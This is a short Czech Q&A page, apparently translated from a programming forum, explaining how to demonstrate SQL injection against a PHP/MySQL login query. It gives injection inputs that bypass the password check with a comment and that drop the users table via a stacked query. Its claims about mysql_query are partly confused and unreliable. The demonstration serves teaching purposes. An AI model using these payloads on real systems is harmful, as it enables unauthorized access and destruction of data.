sql >> Databáze >  >> RDS >> Mysql

Jak demonstrovat SQL Injection v tomto PHP a MySQL kódu?

Něco takového by mělo fungovat:

  1. Chcete-li se přihlásit jako uživatel "foo", nastavte uživatelské jméno na "foo" -- "

Váš dotaz tak bude vypadat jako

$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");

"-- " znamená, že zbytek řádku je zakomentován

  1. Nejsem si jistý, jestli to bude fungovat, ale zkuste nastavit uživatelské jméno na "foo" OR (uživatelé DROP TABLE) -- "

Váš dotaz bude vypadat takto:

$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");

nemusí to však akceptovat - myslím, že poddotazy mohou pouze SELECT.

Funkce mysql_query spustí pouze jeden dotaz – ostatní vám to umožní:

$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''"); 


  1. pg_dump:jak nainstalovat na Amazon Linux pro PostgreSQL 9.5.2?

  2. aktualizovat řádek bez smazání předchozích hodnot v mysql

  3. Kumulativní přidávání s dynamickým základem v Postgresu

  4. SQL Server 2008 – Pokročilé vyhledávání/Řazení